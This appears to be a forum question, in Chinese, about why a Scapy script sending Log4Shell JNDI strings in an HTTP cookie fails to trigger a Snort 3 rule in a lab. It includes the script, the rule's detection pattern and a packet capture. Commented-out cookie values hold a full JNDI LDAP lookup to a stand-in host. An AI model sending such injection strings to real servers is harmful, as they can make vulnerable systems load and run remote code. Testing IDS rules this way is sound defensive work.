我正在尝试使用 Python Scapy 2.5 库触发 Snort 3 IDS 规则。该规则期望看到特定的 HTTP cookie 值。在测试请求时,HTTP 请求被发送到 Snort 位于前面的 HTTP 侦听器。我收到来自侦听器的 200 响应,但未触发规则。这是在虚拟实验室环境中进行的。
这是生成请求的 Python 代码,您可以在其中看到我尝试了几个值来尝试匹配规则正则表达式:
import logging
import socket
from scapy.all import *
from scapy.layers.http import HTTPRequest
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
target_ip = "192.168.208.167"
target_port = 80
# The cookie value to trigger the Snort rule with sid 58726 and rev 6
cookie_name = "jndi"
cookie_value = f"%24%7Bjndi%3A"
#cookie_value = "${jndi:"
#cookie_value = f'test%24%7Bjndi%3Aldap%3A//test.example.com%3A389/Exploit%7D'
#cookie_value = "%24%7Bjndi%3Aldap%3A%2F%2Ftest.example.com%3A389%2FExploit%7D"
def send_request(cookie_name, cookie_value):
http_request = HTTPRequest(
Method=b"GET",
Path=b"/",
Host=bytes(target_ip, encoding="utf-8"),
User_Agent=b"Mozilla/5.0",
Accept=b"*/*",
Connection=b"keep-alive",
Cookie=f"{cookie_name}={cookie_value}"
)
http_request_raw = raw(http_request)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.sendall(http_request_raw)
response = sock.recv(4096)
sock.close()
print(response)
print("Triggered Snort rule with sid: 58726, rev: 6")
send_request(cookie_name, cookie_value)
这是 Snort 规则:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-OTHER Apache Log4j logging remote code execution attempt"; flow:to_server,established; content:"jndi",fast_pattern,nocase; http_cookie; content:"jndi",nocase; pcre:"/(%(25)?24|\x24)(%(25)?7b|\x7b)jndi(%(25)?3a|\x3a)/i"; metadata:policy balanced-ips drop,policy connectivity-ips drop,policy max-detect-ips drop,policy security-ips drop,ruleset community; service:http; reference:cve,2021-44228; reference:cve,2021-44832; reference:cve,2021-45046; reference:cve,2021-45105; classtype:attempted-user; sid:58726; rev:6; )
这是每个 WireShark 的 HTTP 流:
GET / HTTP/1.1
Accept: */*
Connection: keep-alive
Cookie: jndi=%24%7Bjndi%3A
Host: 192.168.208.167
User-Agent: Mozilla/5.0
HTTP/1.1 200 OK
Date: Tue, 09 May 2023 14:03:44 GMT
Content-Type: text/html
Content-Length: 258
Connection: Close
Server: INetSim HTTP Server
<html>
<head>
<title>INetSim default HTML page</title>
</head>
<body>
<p></p>
<p align="center">This is the default HTML page for INetSim HTTP server fake mode.</p>
<p align="center">This file is an HTML document.</p>
</body>
</html>
思考为什么请求没有触发 Snort 规则?